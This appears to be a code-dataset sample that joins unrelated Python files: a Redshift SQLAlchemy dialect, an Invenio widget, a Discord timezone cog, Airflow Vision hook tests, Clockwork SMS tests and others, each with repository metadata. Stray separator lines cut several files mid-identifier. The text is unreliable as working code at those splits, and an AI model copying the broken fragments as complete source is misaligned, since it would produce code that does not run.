identifiers = SQL_IDENTIFIER_RE.findall(key)
if len(identifiers) == 1:
return (None, key)
elif len(identifiers) == 2:
return identifiers
raise ValueError("%s does not look like a valid relation identifier")
def unquoted(key):
"""
Return *ke
|
y* with one level of double quotes removed.
Redshift stores some identifiers without quotes in internal tables,
even though the name must be quoted elsewhere.
In particular, this happens for tables named as a keyword.
"""
if key.startswith('"') and key.endswith('"'):
return key[1:-1]
return key
class RedshiftCompiler(PGCompiler):
def visit_now_func(self, fn, **kw):
return "SYSDATE"
class RedShiftDDLCompiler(PGDDLCompiler):
"""
Handles Redshift-specific CREATE TABLE syntax.
Users can specify the DISTSTYLE, DISTKEY, SORTKEY and ENCODE properties per
table and per column.
Table level properties can be set using the dialect specific syntax. For
example, to specify a distribution key and style you apply the following ::
>>> import sqlalchemy as sa
>>> from sqlalchemy.schema import CreateTable
>>> engine = sa.create_engine('redshift+psycopg2://example')
>>> metadata = sa.MetaData()
>>> user = sa.Table(
... 'user',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_diststyle='KEY',
... redshift_distkey='id',
... redshift_interleaved_sortkey=['id', 'name'],
... )
>>> print(CreateTable(user).compile(engine))
<BLANKLINE>
CREATE TABLE "user" (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) DISTSTYLE KEY DISTKEY (id) INTERLEAVED SORTKEY (id, name)
<BLANKLINE>
<BLANKLINE>
A single sort key can be applied without a wrapping list ::
>>> customer = sa.Table(
... 'customer',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_sortkey='id',
... )
>>> print(CreateTable(customer).compile(engine))
<BLANKLINE>
CREATE TABLE customer (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) SORTKEY (id)
<BLANKLINE>
<BLANKLINE>
Column-level special syntax can also be applied using the column info
dictionary. For example, we can specify the ENCODE for a column ::
>>> product = sa.Table(
... 'product',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String, info={'encode': 'lzo'})
... )
>>> print(CreateTable(product).compile(engine))
<BLANKLINE>
CREATE TABLE product (
id INTEGER NOT NULL,
name VARCHAR ENCODE lzo,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
We can also specify the distkey and sortkey options ::
>>> sku = sa.Table(
... 'sku',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column(
... 'name', sa.String, info={'distkey': True, 'sortkey': True}
... )
... )
>>> print(CreateTable(sku).compile(engine))
<BLANKLINE>
CREATE TABLE sku (
id INTEGER NOT NULL,
name VARCHAR DISTKEY SORTKEY,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
"""
def post_create_table(self, table):
text = ""
info = table.dialect_options['redshift']
diststyle = info.get('diststyle')
if diststyle:
diststyle = diststyle.upper()
if diststyle not in ('EVEN', 'KEY', 'ALL'):
raise exc.CompileError(
u"diststyle {0} is invalid".format(diststyle)
)
text += " DISTSTYLE " + diststyle
distkey = info.get('distkey')
if distkey:
text += " DISTKEY ({0})".format(distkey)
sortkey = info.get('sortkey')
interleaved_sortkey = info.get('interleaved_sortkey')
if sortkey and interleaved_sortkey:
raise exc.ArgumentError(
"Parameters sortkey and interleaved_sortkey are "
"mutually exclusive; you may not specify both."
)
if sortkey or interleaved_sortkey:
if isinstance(sortkey, str):
keys = [sortkey]
else:
keys = sortkey or interleaved_sortkey
keys = [key.name if isinstance(key, Column) else key
for key in keys]
|
ppiotr/Bibedit-some-refactoring
|
modules/webjournal/lib/widgets/bfe_webjournal_widget_latestPhoto.py
|
Python
|
gpl-2.0
| 3,928
| 0.005855
|
# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software F
|
oundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - display photos from given collections
"""
from invenio.bibformat_engine import BibFormatObject
from invenio.search_engine import perform_request_search
from inven
|
io.config import CFG_CERN_SITE, CFG_SITE_URL
def format(bfo, collections, max_photos="3", separator="<br/>"):
"""
Display the latest pictures from the given collection(s)
@param collections: comma-separated list of collection form which photos have to be fetched
@param max_photos: maximum number of photos to display
@param separator: separator between photos
"""
try:
int_max_photos = int(max_photos)
except:
int_max_photos = 0
try:
collections_list = [coll.strip() for coll in collections.split(',')]
except:
collections_list = []
out = get_widget_html(bfo.lang, int_max_photos,
collections_list, separator, bfo.lang)
return out
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
def get_widget_html(language, max_photos, collections, separator, ln):
"""
Returns the content of the widget
"""
latest_photo_ids = perform_request_search(c=collections,
rg=max_photos,
of='id')
images_urls = []
for recid in latest_photo_ids[:max_photos]:
try:
photo_record = BibFormatObject(recid)
except:
# todo: Exception, no photo in this selection
continue
if language == "fr":
try:
title = photo_record.fields('246_1a', escape=1)[0]
except KeyError:
title = ""
else:
try:
title = photo_record.fields('245__a', escape=1)[0]
except KeyError:
# todo: exception, picture with no title
title = ""
if CFG_CERN_SITE and photo_record.fields('8567_'):
# Get from 8567_
dfs_images = photo_record.fields('8567_')
for image_block in dfs_images:
if image_block.get("y", '') == "Icon":
if image_block.get("u", '').startswith("http://"):
images_urls.append((recid, image_block["u"], title))
break # Just one image per record
else:
# Get from 8564_
images = photo_record.fields('8564_')
for image_block in images:
if image_block.get("x", '').lower() == "icon":
if image_block.get("q", '').startswith("http://"):
images_urls.append((recid, image_block["q"], title))
break # Just one image per record
# Build output
html_out = separator.join(['<a href="%s/record/%i?ln=%s"><img class="phr" width="100" height="67" src="%s"/>%s</a>' % (CFG_SITE_URL, recid, ln, photo_url, title) for (recid, photo_url, title) in images_urls])
return html_out
|
TheMasterGhost/CorpBot
|
Cogs/Time.py
|
Python
|
mit
| 8,457
| 0.03299
|
import asyncio
import discord
import datetime
import pytz
from discord.ext import commands
from Cogs import FuzzySearch
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Message
from Cogs import Nullify
class Time:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
@commands.command(pass_context=True)
async def settz(self, ctx, *, tz : str = None):
"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
if not tz:
self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
return
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
for tz in tz_list:
msg += tz['Item'] + "\n"
msg += '```'
await ctx.channel.send(msg)
return
# We got a time zone
self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))
@commands.command(pass_context=True)
async def listtz(self, ctx, *, tz_search = None):
"""List all the supported TimeZones in PM."""
if not tz_search:
msg = "__Available TimeZones:__\n\n"
for tz in pytz.all_timezones:
msg += tz + "\n"
else:
tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
msg = "__Top 3 TimeZone Matches:__\n\n"
for tz in tz_list:
msg += tz['Item'] + "\n"
await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)
@commands.command(pass_context=True)
async def tz(self, ctx, *, member = None):
"""See a member's TimeZone."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName
|
= member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
|
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
timezone = self.settings.getGlobalUserStat(member, "TimeZone")
if timezone == None:
msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def setoffset(self, ctx, *, offset : str = None):
"""Set your UTC offset."""
if offset == None:
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
await ctx.channel.send(msg)
return
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
off = "{}:{}".format(hours, minutes)
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def offset(self, ctx, *, member = None):
"""See a member's UTC offset."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
msg = 'UTC'
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def time(self, ctx, *, offset : str = None):
"""Get UTC time +- an offset."""
timezone = None
if offset == None:
member = ctx.message.author
else:
# Try to get a user first
member = DisplayName.memberForName(offset, ctx.message.guild)
if member:
# We got one
# Check for timezone first
offset = self.settings.getGlobalUserStat(member, "TimeZone")
if offset == None:
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
await ctx.channel.send(msg)
return
# At this point - we need to determine if we have an offset - or possibly a timezone passed
t = self.getTimeFromTZ(offset)
if t == None:
# We did not get an offset
t = self.getTimeFromOffset(offset)
if t == None:
await ctx.channel.send("I couldn't find that TimeZone or offset!")
return
if member:
msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
else:
msg = '{} is currently *{}*'.format(t["zone"], t["time"])
# Say message
await ctx.channel.send(msg)
def getTimeFromOffset(self, offset):
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
return None
# await ctx.channel.send('Offset has to be in +-H:M!')
# return
msg = 'UTC'
# Get the time
t = datetime.datetime.utcnow()
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
td = datetime.timedelta(hours=hours, minutes=minutes)
newTime = t + td
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
newTime = t - td
else:
# No offset
newTime = t
return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }
def getTimeFromTZ(self, tz):
# Assume sanitized zones - as they're pulled from pytz
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_
|
donspaulding/adspygoogle
|
examples/adspygoogle/dfp/v201302/inventory_service/get_ad_unit_hierarchy.py
|
Python
|
apache-2.0
| 3,490
| 0.010029
|
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code gets the ad unit hierarchy and displays it as a tree.
To create ad units, run create_ad_units.py
Tags: InventoryService.getAdUnit
Tags: NetworkService.getCurrentNetwork
"""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Get ad units by statement.
all_ad_units = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service)
# Find the root ad unit. root_ad_unit can also be set to child unit to only
# build and display a portion of the tree.
# i.e. root_ad_unit = inventory_service.GetAdUnit('INSERT_AD_UNIT_HERE')[0]
response = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service, query='WHERE parentId IS NULL')
root_ad_unit = {}
if response:
root_ad_unit = response[0]
if root_ad_unit:
BuildAndDisplayAdUnitTree(response[0], all_ad_units)
else:
print 'Could not build tree. No root ad unit found.'
def DisplayAdUnitTree(root_ad_unit, ad_unit_tree, depth=0):
"""Helper for displaying ad unit tree.
Args:
root_ad_unit: dict the root ad unit.
ad_unit_tree: dict the tree of ad units.
[optional]
depth: int the depth the tree has reached.
"""
print '%s%s (%s)' % (GenerateTab(depth), root_ad_unit['name'],
root_ad_unit['id'])
if root_ad_unit['id'] in ad_unit_tree:
for child in ad_unit_tree[root_ad_unit['id']]:
DisplayAdUnitTree(child, ad_unit_tree, depth+1)
def GenerateTab(depth):
"""Generate tabs to represent branching to children.
Args:
depth: int the depth the tree has reached.
Returns:
string inserted in front of the root unit.
"""
tab_list = []
if depth > 0:
tab_list.append(' ')
tab_list.append('| ' * depth)
tab_list.append('+--')
return ''.join(tab_list)
def BuildAndDisplayAdUnitTree(root_ad_unit, all_ad_units):
"""Create an ad unit tree and display it.
Args:
|
root_ad_unit: dict the root ad unit to build the tree under.
all_ad_units: list the list of all ad units to build the tree with.
"""
tree = {}
for ad_unit in all_ad_units:
if 'parentId' in ad_unit:
if ad_unit['parentId'] not in tree:
tree[ad_unit['parentId']] = []
tree[ad_unit['parentId']].append(ad_unit)
DisplayAdUnitTree(root_ad_unit, tree)
if __name__ == '__main__':
# Initialize client object.
|
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)
|
apache/incubator-airflow
|
tests/providers/google/cloud/hooks/test_vision.py
|
Python
|
apache-2.0
| 38,031
| 0.003523
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features
|
': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enu
|
ms.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
get_product_set_method = get_conn.return_value.ge
|
JoyTeam/metagam3d
|
python/metagam3d/objects.py
|
Python
|
lgpl-3.0
| 3,360
| 0.004762
|
im
|
port _metagam3d
from _metagam3d import AxisAlignment, AlignmentType
from metagam3d.channels import blocking
from metagam3d.scripts import m3d_expr
from concurrence import Tasklet
class LoadError(Exception):
pass
class Object(_metagam3d.Object):
def __init__(self, objid):
_metagam3d.Object
|
.__init__(self, objid)
self._params = {}
def param(self, paramid):
"Get parameter object for given parameter id"
try:
return self._params[paramid]
except KeyError:
pass
param = ObjectParam(self, paramid)
self._params[paramid] = param
return param
def load(self, filename, flags=0):
"Load and return new subobject from file"
objid = _metagam3d._loadObject(filename, self.id, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(self, axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(self.id, axisAlignment, alignment))
def getParam(self, paramid, t):
return self.param(paramid).getValue(t)
def setParam(self, paramid, val):
if type(val) is not _metagam3d.DynamicValue:
if type(val) is not _metagam3d.Variant:
val = _metagam3d.Variant(val)
val = _metagam3d.DynamicValue(val)
self.param(paramid).setValue(val)
def setParam3(self, paramid, x, y, z):
self.setParam(paramid, _metagam3d.Vec3d(x, y, z))
def setParamExpr(self, paramid, expr, till=None):
self.param(paramid).setValue(m3d_expr(expr, till))
def assignMaterial(self, geodeName, ambient=0, diffuse=0, specular=0, emission=0, shininess=0):
_metagam3d._assignMaterial(self.id, geodeName, ambient, diffuse, specular, emission, shininess)
def createConsole(self, cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(self.id, cols, rows, fontSize))
def createLine(self):
return Object(_metagam3d._createLine(self.id))
def destroyAfter(self, t):
Tasklet.new(self._destroyAfter)(t)
def _destroyAfter(self, t):
Tasklet.sleep(t)
self.destroy()
class Console(Object):
def println(self, elements):
line = _metagam3d.ConsoleLine()
for el in elements:
line.add(_metagam3d.ConsoleLineElement(el[0], el[1]))
_metagam3d._printConsole(self.id, line)
class ObjectParam(_metagam3d.ObjectParam):
def __init__(self, obj, paramid):
_metagam3d.ObjectParam.__init__(self, obj.id, paramid)
self._obj = obj
@property
def obj(self):
return self._obj
def load(filename, flags=0):
"Load root level object from file"
objid = _metagam3d._loadObject(filename, 0, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(0, axisAlignment, alignment))
def createConsole(cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(0, cols, rows, fontSize))
def createLine():
return Object(_metagam3d._createLine(0))
|
danithaca/berrypicking
|
django/advanced/crop/migrations/0002_auto_20150123_1831.py
|
Python
|
gpl-2.0
| 628
| 0.001592
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('crop', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='cropping',
field=image_cropping.fields.ImageRatioField('avatar', '200x200', verbose_name='cropping', help_text=None, adapt_rotation=False, size_warning=False, free_crop=False, hide_image_fiel
|
d=False, allow_fullsize=False),
preserve_default=True,
|
),
]
|
mediaburst/clockwork-python
|
tests/clockwork_tests.py
|
Python
|
mit
| 3,369
| 0.004808
|
# -*- coding: utf-8 -*-
import unittest
from clockwork import clockwork
from clockwork import clockwork_exceptions
class ApiTests(unittest.TestCase):
api_key = "YOUR_API_KEY_HERE"
def test_should_send_single_message(self):
"""Sending a single SMS with the minimum detail and no errors should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="This is a test message")
response = api.send(sms)
self.assertTrue(response.success)
def test_should_send_single_unicode_message(self):
"""Sending a single SMS with the full GSM character set (apart from ESC and form feed) should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(
to="441234567890",
#Message table copied from http://www.clockworksms.com/doc/reference/faqs/gsm-character-set/
message=u'''@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ'''
u''' !"#¤%&'()*+,-./'''
u'''0123456789:;<=>?'''
u'''¡ABCDEFGHIJKLMNO'''
u'''PQRSTUVWXYZÄÖÑܧ'''
u'''¿abcdefghijklmno'''
u''
|
'pqrstuvwxyzäöñüà'''
u'''€[\]^{|}~'''
,long=True)
response = api.send(sms)
self.assertTrue(response.success)
def test_should_fail_with_no_message(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="")
response = api.send(sms)
self.assertFalse(response.success)
def
|
test_should_fail_with_no_to(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="", message="This is a test message")
response = api.send(sms)
self.assertFalse(response.success)
def test_should_send_multiple_messages(self):
"""Sending multiple sms messages should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="This is a test message 2")
response = api.send([sms1,sms2])
for r in response:
self.assertTrue(r.success)
def test_should_send_multiple_messages_with_erros(self):
"""Sending multiple sms messages, one of which has an invalid message should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="")
response = api.send([sms1, sms2])
self.assertTrue(response[0].success)
self.assertFalse(response[1].success)
def test_should_fail_with_invalid_key(self):
api = clockwork.API("this_key_is_wrong")
sms = clockwork.SMS(to="441234567890", message="This is a test message 1")
self.assertRaises(clockwork_exceptions.ApiException, api.send, sms)
def test_should_be_able_to_get_balance(self):
api = clockwork.API(self.api_key)
balance = api.get_balance()
self.assertEqual('PAYG', balance['account_type'])
if __name__ == "__main__":
unittest.main()
|
jinzekid/codehub
|
python/数据分析/func_lambda_test.py
|
Python
|
gpl-3.0
| 150
| 0.02
|
from math import log
def make_logarithmic_function(base):
return lambda x: log(x, b
|
ase)
My_LF = make_logarithmic_function(3)
print(My_LF(9))
|
|
extsui/7SegFinger
|
test_8digit.py
|
Python
|
mit
| 4,304
| 0.035431
|
# -*- coding: utf-8 -*-
import spidev
import math
def reverse_bit_order(x):
x_reversed = 0x00
if (x & 0x80):
x_reversed |= 0x01
if (x & 0x40):
x_reversed |= 0x02
if (x & 0x20):
x_reversed |= 0x04
if (x & 0x10):
x_reversed |= 0x08
if (x & 0x08):
x_reversed |= 0x10
if (x & 0x04):
x_reversed |= 0x20
if (x & 0x02):
x_reversed |= 0x40
if (x & 0x01):
x_reversed |= 0x80
return x_reversed
"""
x = (((x & 0x55) << 1) | ((x & 0xAA) >> 1)) % 0xFF
x = (((x & 0x33) << 2) | ((x & 0xCC) >> 2)) % 0xFF
return ((x << 4) | (x >> 4)) % 0xFF
"""
def calc_checksum(array):
sum = 0
for item in array:
